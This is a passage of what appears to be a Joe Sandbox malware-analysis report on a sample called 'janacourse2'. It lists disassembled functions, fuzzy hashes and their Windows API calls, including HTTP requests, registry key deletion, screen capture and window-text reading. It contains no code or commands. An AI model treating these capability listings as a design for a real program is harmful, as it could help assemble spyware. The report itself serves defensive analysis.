• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
• String ID: 0
• API String ID: 36266755-4108050209
• Opcode ID: 8516ece18c2f20152dbba997ab758930598530243330083c72e5cc16900b365a
• Instruction ID: c30af7410b77cd70149d509aabcfb45e43655643bc4695a8f54e0692742fde6a
• Opcode Fuzzy Hash: 8516ece18c2f20152dbba997ab758930598530243330083c72e5cc16900b365a
• Instruction Fuzzy Hash: D271F771A40209BFFB218F65CD89FAABF64FF04324F204216F6156A1E0C7B5A950EB91
APIs
• DestroyWindow.USER32(?,?), ref: 01046DEB
  • Part of subcall function 00FB6B57: _wcslen.LIBCMT ref: 00FB6B6A
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 01046E5F
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 01046E81
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01046E94
• DestroyWindow.USER32(?), ref: 01046EB5
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00FB0000,00000000), ref: 01046EE4
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01046EFD
• GetDesktopWindow.USER32 ref: 01046F16
• GetWindowRect.USER32(00000000), ref: 01046F1D
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 01046F35
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 01046F4D
  • Part of subcall function 00FC9944: GetWindowLongW.USER32(?,000000EB), ref: 00FC9952
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
• String ID: 0$tooltips_class32
• API String ID: 2429346358-3619404913
• Opcode ID: bbb0b50e1f632782455bcc8e91b9e1bb59b94634b6d4f0c489de79130f295bae
• Instruction ID: dd479b368f5b0bdd0567b66aa81fc06395649c9fb3aa8a92a5268f62b5e15d70
• Opcode Fuzzy Hash: bbb0b50e1f632782455bcc8e91b9e1bb59b94634b6d4f0c489de79130f295bae
• Instruction Fuzzy Hash: 1D717BB4104340AFEB21CF1DC984EAABBF9FB8A300F44446DF9D987261D776A906CB11
APIs
  • Part of subcall function 00FC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FC9BB2
• DragQueryPoint.SHELL32(?,?), ref: 01049147
  • Part of subcall function 01047674: ClientToScreen.USER32(?,?), ref: 0104769A
  • Part of subcall function 01047674: GetWindowRect.USER32(?,?), ref: 01047710
  • Part of subcall function 01047674: PtInRect.USER32(?,?,01048B89), ref: 01047720
• SendMessageW.USER32(?,000000B0,?,?), ref: 010491B0
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 010491BB
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 010491DE
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 01049225
• SendMessageW.USER32(?,000000B0,?,?), ref: 0104923E
• SendMessageW.USER32(?,000000B1,?,?), ref: 01049255
• SendMessageW.USER32(?,000000B1,?,?), ref: 01049277
• DragFinish.SHELL32(?), ref: 0104927E
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 01049371
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 221274066-3440237614
• Opcode ID: 9fe190b1c894ba9b10b3f14c2da12487cabc6b3d570532734a6b666965f55ab6
• Instruction ID: ae2253eb6521e038e8b83200ec85c573cbeb3966af9fc62f12942e7770802f71
• Opcode Fuzzy Hash: 9fe190b1c894ba9b10b3f14c2da12487cabc6b3d570532734a6b666965f55ab6
• Instruction Fuzzy Hash: 84618AB1108301AFD311EF61DD85DAFBBE8EF88350F00092DF591931A0DB759A49CB52
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0102C4B0
• GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0102C4C3
• SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0102C4D7
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0102C4F0
• InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0102C533
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0102C549
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0102C554
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0102C584
• GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0102C5DC
• SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0102C5F0
• InternetCloseHandle.WININET(00000000), ref: 0102C5FB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
• String ID:
• API String ID: 3800310941-3916222277
• Opcode ID: 012cd350f03d708f68900f2c6f273ff4812f5df9624e5cf7d7806dc948b381dc
• Instruction ID: 5885097def1df09894162358b9658b889fe87ac5b5a28770c298a016f4f7d28d
• Opcode Fuzzy Hash: 012cd350f03d708f68900f2c6f273ff4812f5df9624e5cf7d7806dc948b381dc
• Instruction Fuzzy Hash: 05515BB4501629BFFB218F64CB88AAF7BFCFF08744F004419F98696200DB39D9449B60
APIs
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 01048592
• GetFileSize.KERNEL32(00000000,00000000), ref: 010485A2
• GlobalAlloc.KERNEL32(00000002,00000000), ref: 010485AD
• CloseHandle.KERNEL32(00000000), ref: 010485BA
• GlobalLock.KERNEL32(00000000), ref: 010485C8
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 010485D7
• GlobalUnlock.KERNEL32(00000000), ref: 010485E0
• CloseHandle.KERNEL32(00000000), ref: 010485E7
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 010485F8
• OleLoadPicture.OLEAUT32(?,00000000,00000000,0104FC38,?), ref: 01048611
• GlobalFree.KERNEL32(00000000), ref: 01048621
• GetObjectW.GDI32(?,00000018,000000FF), ref: 01048641
• CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 01048671
• DeleteObject.GDI32(00000000), ref: 01048699
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 010486AF
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3840717409-0
• Opcode ID: 17ccb7cb7495f71ef0177053ca538e0abb4b2e8c270cf10943bbcfc42efb0864
• Instruction ID: 665535d358d681a449629988a202187071508a0efedd70e84b77574a22e76ba5
• Opcode Fuzzy Hash: 17ccb7cb7495f71ef0177053ca538e0abb4b2e8c270cf10943bbcfc42efb0864
• Instruction Fuzzy Hash: D14151B5601204BFE721DFA9CE88EAE7BB8FF89711F008469F949E7250D7759901CB60
APIs
• VariantInit.OLEAUT32(00000000), ref: 01021502
• VariantCopy.OLEAUT32(?,?), ref: 0102150B
• VariantClear.OLEAUT32(?), ref: 01021517
• VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 010215FB
• VarR8FromDec.OLEAUT32(?,?), ref: 01021657
• VariantInit.OLEAUT32(?), ref: 01021708
• SysFreeString.OLEAUT32(?), ref: 0102178C
• VariantClear.OLEAUT32(?), ref: 010217D8
• VariantClear.OLEAUT32(?), ref: 010217E7
• VariantInit.OLEAUT32(00000000), ref: 01021823
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
• String ID: %4d%02d%02d%02d%02d%02d$Default
• API String ID: 1234038744-3931177956
• Opcode ID: 132cb67120dbbf25f423e4c111936f16e93f5fe3b8cecc690fcbf021260adbc0
• Instruction ID: f0b9a11fc2477efdb80679a070d03574731df128d0075117eb83fa9d5a23c5fa
• Opcode Fuzzy Hash: 132cb67120dbbf25f423e4c111936f16e93f5fe3b8cecc690fcbf021260adbc0
• Instruction Fuzzy Hash: CDD11571A00235DBEB149F65D985BBDBBF5BF04700F0880DAF596AB180DB38E845DBA1
APIs
  • Part of subcall function 00FB9CB3: _wcslen.LIBCMT ref: 00FB9CBD
  • Part of subcall function 0103C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0103B6AE,?,?), ref: 0103C9B5
  • Part of subcall function 0103C998: _wcslen.LIBCMT ref: 0103C9F1
  • Part of subcall function 0103C998: _wcslen.LIBCMT ref: 0103CA68
  • Part of subcall function 0103C998: _wcslen.LIBCMT ref: 0103CA9E
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0103B6F4
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0103B772
• RegDeleteValueW.ADVAPI32(?,?), ref: 0103B80A
• RegCloseKey.ADVAPI32(?), ref: 0103B87E
• RegCloseKey.ADVAPI32(?), ref: 0103B89C
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 0103B8F2
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0103B904
• RegDeleteKeyW.ADVAPI32(?,?), ref: 0103B922
• FreeLibrary.KERNEL32(00000000), ref: 0103B983
• RegCloseKey.ADVAPI32(00000000), ref: 0103B994
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 146587525-4033151799
• Opcode ID: 9b5ba80e29ed811f4ede6cbc569f1d33f3662a5fe76a287463eb9b6e6ca76bc0
• Instruction ID: 3cf8cec51e34568a2c64647fd6a5d5f7743616e03835d620d5edd8d08c64fb38
• Opcode Fuzzy Hash: 9b5ba80e29ed811f4ede6cbc569f1d33f3662a5fe76a287463eb9b6e6ca76bc0
• Instruction Fuzzy Hash: 91C1AF34204201AFE720DF19C895F6ABBE5FF85308F18849DF59A8B292CB75E845CF91
APIs
• GetDC.USER32(00000000), ref: 010325D8
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 010325E8
• CreateCompatibleDC.GDI32(?), ref: 010325F4
• SelectObject.GDI32(00000000,?), ref: 01032601
• StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0103266D
• GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 010326AC
• GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 010326D0
• SelectObject.GDI32(?,?), ref: 010326D8
• DeleteObject.GDI32(?), ref: 010326E1
• DeleteDC.GDI32(?), ref: 010326E8
• ReleaseDC.USER32(00000000,?), ref: 010326F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
• Opcode ID: e29da37f7c921e1799119d7b04e73bbb639e3789e0c2c0ff580ce094a76b9043
• Instruction ID: 81b8627f643561efed6c499d07a028b66fe24966f8cf57d4fccf47814520ae51
• Opcode Fuzzy Hash: e29da37f7c921e1799119d7b04e73bbb639e3789e0c2c0ff580ce094a76b9043
• Instruction Fuzzy Hash: 9C6113B5D00219EFDF15CFA4C984AAEBBB9FF48310F208529E995A7250D775A940CF50
APIs
• ___free_lconv_mon.LIBCMT ref: 00FEDAA1
  • Part of subcall function 00FED63C: _free.LIBCMT ref: 00FED659
  • Part of subcall function 00FED63C: _free.LIBCMT ref: 00FED66B
  • Part of subcall function 00FED63C: _free.LIBCMT ref: 00FED67D
  • Part of subcall function 00FED63C: _free.LIBCMT ref: 00FED68F
  • Part of subcall function 00FED63C: _free.LIBCMT ref: 00FED6A1
  • Part of subcall function 00FED63C: _free.LIBCMT ref: 00FED6B3
  • Part of subcall function 00FED63C: _free.LIBCMT ref: 00FED6C5
  • Part of subcall function 00FED63C: _free.LIBCMT ref: 00FED6D7
  • Part of subcall function 00FED63C: _free.LIBCMT ref: 00FED6E9
  • Part of subcall function 00FED63C: _free.LIBCMT ref: 00FED6FB
  • Part of subcall function 00FED63C: _free.LIBCMT ref: 00FED70D
  • Part of subcall function 00FED63C: _free.LIBCMT ref: 00FED71F
  • Part of subcall function 00FED63C: _free.LIBCMT ref: 00FED731
• _free.LIBCMT ref: 00FEDA96
  • Part of subcall function 00FE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00FED7D1,00000000,00000000,00000000,00000000,?,00FED7F8,00000000,00000007,00000000,?,00FEDBF5,00000000), ref: 00FE29DE
  • Part of subcall function 00FE29C8: GetLastError.KERNEL32(00000000,?,00FED7D1,00000000,00000000,00000000,00000000,?,00FED7F8,00000000,00000007,00000000,?,00FEDBF5,00000000,00000000), ref: 00FE29F0
• _free.LIBCMT ref: 00FEDAB8
• _free.LIBCMT ref: 00FEDACD
• _free.LIBCMT ref: 00FEDAD8
• _free.LIBCMT ref: 00FEDAFA
• _free.LIBCMT ref: 00FEDB0D
• _free.LIBCMT ref: 00FEDB1B
• _free.LIBCMT ref: 00FEDB26
• _free.LIBCMT ref: 00FEDB5E
• _free.LIBCMT ref: 00FEDB65
• _free.LIBCMT ref: 00FEDB82
• _free.LIBCMT ref: 00FEDB9A
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: b4973bf0b097167acb3c3e063f432836509675b663a4bbe9793e3f268e849a77
• Instruction ID: 90c73366e794c1a2fd6da5dc857c3eed12fdfed3c76830ca41cc49df1f2d23b2
• Opcode Fuzzy Hash: b4973bf0b097167acb3c3e063f432836509675b663a4bbe9793e3f268e849a77
• Instruction Fuzzy Hash: 06319F31A043899FEB61AA3AEC42B5A77E8FF40320F114429E058D7592EF39ED40F721
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 0101369C
• _wcslen.LIBCMT ref: 010136A7
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 01013797
• GetClassNameW.USER32(?,?,00000400), ref: 0101380C
• GetDlgCtrlID.USER32(?), ref: 0101385D
• GetWindowRect.USER32(?,?), ref: 01013882
• GetParent.USER32(?), ref: 010138A0
• ScreenToClient.USER32(00000000), ref: 010138A7
• GetClassNameW.USER32(?,?,00000100), ref: 01013921
• GetWindowTextW.USER32(?,?,00000400), ref: 0101395D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
• String ID: %s%u
• API String ID: 4010501982-679674701
• Opcode ID: faf3805b0603e55a9c9966c5b5f62f1c74efd95fa61ea7af93c5997e694a2903
• Instruction ID: 4c8188c995d83e03ec1b814bab1f14f32a656333890f7330b7e42a2e7afbfa59
• Opcode Fuzzy Hash: faf3805b0603e55a9c9966c5b5f62f1c74efd95fa61ea7af93c5997e694a2903
• Instruction Fuzzy Hash: 6491B171204206AFE719DF28C884BEAF7E9FF44360F008529FAD9D6184DB38A545CB91
APIs
• GetClassNameW.USER32(?,?,00000400), ref: 01014994
• GetWindowTextW.USER32(?,?,00000400), ref: 010149DA
• _wcslen.LIBCMT ref: 010149EB
• CharUpperBuffW.USER32(?,00000000), ref: 010149F7
• _wcsstr.LIBVCRUNTIME ref: 01014A2C
• GetClassNameW.USER32(00000018,?,00000400), ref: 01014A64
• GetWindowTextW.USER32(?,?,00000400), ref: 01014A9D
• GetClassNameW.USER32(00000018,?,00000400), ref: 01014AE6
• GetClassNameW.USER32(?,?,00000400), ref: 01014B20
• GetWindowRect.USER32(?,?), ref: 01014B8B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                            • String ID: ThumbnailClass
                                                                                                            • API String ID: 1311036022-1241985126
                                                                                                            • Opcode ID: 3c97d3ac86eb7ebafa67fdaeae8a14f2bf23977036f5301e7bfa37471a29b74e
                                                                                                            • Instruction ID: d08d1b6c3b7c9335ac261174cd3f325abfd0e266c89c57fac04e51c0bc067ac8
                                                                                                            • Opcode Fuzzy Hash: 3c97d3ac86eb7ebafa67fdaeae8a14f2bf23977036f5301e7bfa37471a29b74e
                                                                                                            • Instruction Fuzzy Hash: 2391B2710042059FEB15DF18C984BAA7BE9FF44314F0484A9FEC5DA1AADB38E945CBA1
APIs
• GetMenuItemInfoW.USER32(01081990,000000FF,00000000,00000030), ref: 0101BFAC
• SetMenuItemInfoW.USER32(01081990,00000004,00000000,00000030), ref: 0101BFE1
• Sleep.KERNEL32(000001F4), ref: 0101BFF3
• GetMenuItemCount.USER32(?), ref: 0101C039
• GetMenuItemID.USER32(?,00000000), ref: 0101C056
• GetMenuItemID.USER32(?,-00000001), ref: 0101C082
• GetMenuItemID.USER32(?,?), ref: 0101C0C9
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0101C10F
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0101C124
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0101C145
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep
• String ID: 0
• API String ID: 1460738036-4108050209
• Opcode ID: 34e06f60d5d6d2152a2dfb5e7fb121c98e38049168c31cdfbb41012d1c4ea817
• Instruction ID: 405788cbb811c02dd9661faf74d3ca315d6810072feaba64ff389feb48f79115
• Opcode Fuzzy Hash: 34e06f60d5d6d2152a2dfb5e7fb121c98e38049168c31cdfbb41012d1c4ea817
• Instruction Fuzzy Hash: 066184B0940246AFFF21CF68CA88AEE7FB4FB46344F044155F991A3245C739E945CB60
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0103CC64
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0103CC8D
• FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0103CD48
  • Part of subcall function 0103CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0103CCAA
  • Part of subcall function 0103CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0103CCBD
  • Part of subcall function 0103CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0103CCCF
  • Part of subcall function 0103CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0103CD05
  • Part of subcall function 0103CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0103CD28
• RegDeleteKeyW.ADVAPI32(?,?), ref: 0103CCF3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2734957052-4033151799
• Opcode ID: 38fc5f615258d1eb852bbb363066371d299e778db7fd842e29edaf6154670a60
• Instruction ID: 060f28e66b44d27fc37b070ac37edd57ed40b400f54076f62488ccfc42254b21
• Opcode Fuzzy Hash: 38fc5f615258d1eb852bbb363066371d299e778db7fd842e29edaf6154670a60
• Instruction Fuzzy Hash: 813182B5902129BBF7319A55DE88EFFBFBCEF46640F000166F981E2104DA349A45DBA0
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 01023D40
• _wcslen.LIBCMT ref: 01023D6D
• CreateDirectoryW.KERNEL32(?,00000000), ref: 01023D9D
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 01023DBE
• RemoveDirectoryW.KERNEL32(?), ref: 01023DCE
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 01023E55
• CloseHandle.KERNEL32(00000000), ref: 01023E60
